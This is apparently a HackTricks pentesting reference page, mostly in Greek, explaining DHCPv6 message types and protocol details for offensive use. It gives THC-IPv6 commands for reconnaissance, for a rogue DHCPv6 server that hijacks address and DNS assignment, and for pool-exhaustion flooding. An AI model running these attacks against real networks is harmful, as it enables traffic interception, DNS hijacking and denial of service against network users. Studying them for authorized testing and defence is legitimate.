DHCPv6

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

DHCPv6 vs. DHCPv4 Message Types Comparison

Παρουσιάζεται μια συγκριτική επισκόπηση των τύπων μηνυμάτων του DHCPv6 και DHCPv4 στον παρακάτω πίνακα:

Detailed Explanation of DHCPv6 Message Types:

1. Solicit (1): Ξεκινάει από έναν DHCPv6 client για να βρει διαθέσιμους servers.
2. Advertise (2): Στέλνεται από servers ως απάντηση σε Solicit, υποδεικνύοντας διαθεσιμότητα για DHCP service.
3. Request (3): Οι clients το χρησιμοποιούν για να ζητήσουν IP addresses ή prefixes από συγκεκριμένο server.
4. Confirm (4): Χρησιμοποιείται από έναν client για να επαληθεύσει αν οι εκχωρημένες διευθύνσεις είναι ακόμη έγκυρες στο δίκτυο, συνήθως μετά από αλλαγή δικτύου.
5. Renew (5): Οι clients το στέλνουν στον αρχικό server για να επεκτείνουν το lifetime των διευθύνσεων ή να ενημερώσουν ρυθμίσεις.
6. Rebind (6): Στέλνεται σε οποιονδήποτε server για να επεκτείνει το lifetime των διευθύνσεων ή να ενημερώσει ρυθμίσεις, ειδικά όταν δεν υπάρχει απάντηση σε Renew.
7. Reply (7): Οι servers το χρησιμοποιούν για να παρέχουν διευθύνσεις, παραμέτρους ρύθμισης, ή για να επιβεβαιώσουν μηνύματα όπως Release ή Decline.
8. Release (8): Οι clients ενημερώνουν τον server να σταματήσει τη χρήση μίας ή περισσοτέρων εκχωρημένων διευθύνσεων.
9. Decline (9): Στέλνεται από clients για να αναφέρουν ότι οι εκχωρημένες διευθύνσεις βρίσκονται σε conflict στο δίκτυο.
10. Reconfigure (10): Οι servers προτίνουν τους clients να ξεκινήσουν transactions για νέες ή ενημερωμένες ρυθμίσεις.
11. Information-Request (11): Οι clients ζητούν παραμέτρους ρύθμισης χωρίς εκχώρηση IP address.
12. Relay-Forw (12): Οι relay agents προωθούν μηνύματα προς τους servers.
13. Relay-Repl (13): Οι servers απαντούν στους relay agents, οι οποίοι στη συνέχεια παραδίδουν το μήνυμα στον client.

Quick Protocol Notes (Offensive)

• Οι DHCPv6 clients χρησιμοποιούν UDP port 546 και οι servers/relays χρησιμοποιούν UDP port 547.
• Οι clients στέλνουν Solicit στο All_DHCP_Relay_Agents_and_Servers (ff02::1:2); οι servers/relays ακούνε εκεί. Το All_DHCP_Servers είναι ff05::1:3.
• Οι ταυτότητες client και server μεταφέρονται στα OPTION_CLIENTID και OPTION_SERVERID χρησιμοποιώντας DUIDs. Αυτό είναι χρήσιμο για fingerprinting του ίδιου host όταν αλλάζουν οι διευθύνσεις.
• Η εκχώρηση διευθύνσεων ζητείται με IA_NA (non-temporary address) και η ανάθεση prefix με IA_PD (downstream router prefix).

Quick Recon

# Basic DHCPv6 traffic capture
sudo tcpdump -vvv -i <IFACE> 'udp port 546 or udp port 547'

# THC-IPv6: discover DHCPv6 servers and their options
sudo atk6-dump_dhcp6 <IFACE>

Κακόβουλος DHCPv6 Διακομιστής (Address/DNS Hijack)

# THC-IPv6: rogue DHCPv6 server advertising address + DNS
sudo atk6-fake_dhcps6 <IFACE> <PREFIX>/<LEN> <DNSv6>

Αυτός είναι ένας γενικός on-link rogue DHCPv6 διακομιστής. Σε δίκτυα Windows/AD, συνδυάστε τον με higher-level relays (βλέπε τη σελίδα IPv6) εάν θέλετε NTLM relay primitives.

Pool Exhaustion / DHCPv6 Starvation

# THC-IPv6: exhaust the server's address pool
sudo atk6-flood_dhcpc6 <IFACE>

Προειδοποίηση για το μήνυμα Reconfigure

Το DHCPv6 Reconfigure δεν γίνεται αποδεκτό αδιακρίτως: οι πελάτες το αποδέχονται μόνο αν έχουν ρητά στείλει την επιλογή OPTION_RECONF_ACCEPT. Από προεπιλογή, ένας πελάτης είναι απρόθυμος να αποδεχτεί μηνύματα Reconfigure, επομένως μη αξιόπιστες επιθέσεις Reconfigure συχνά αποτυγχάνουν εκτός αν παρατηρήσετε/προκαλέσετε αυτή την επιλογή.

Pentesting IPv6

Αναφορές

• https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages

• https://www.rfc-editor.org/rfc/rfc8415

• https://www.kali.org/tools/thc-ipv6/

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.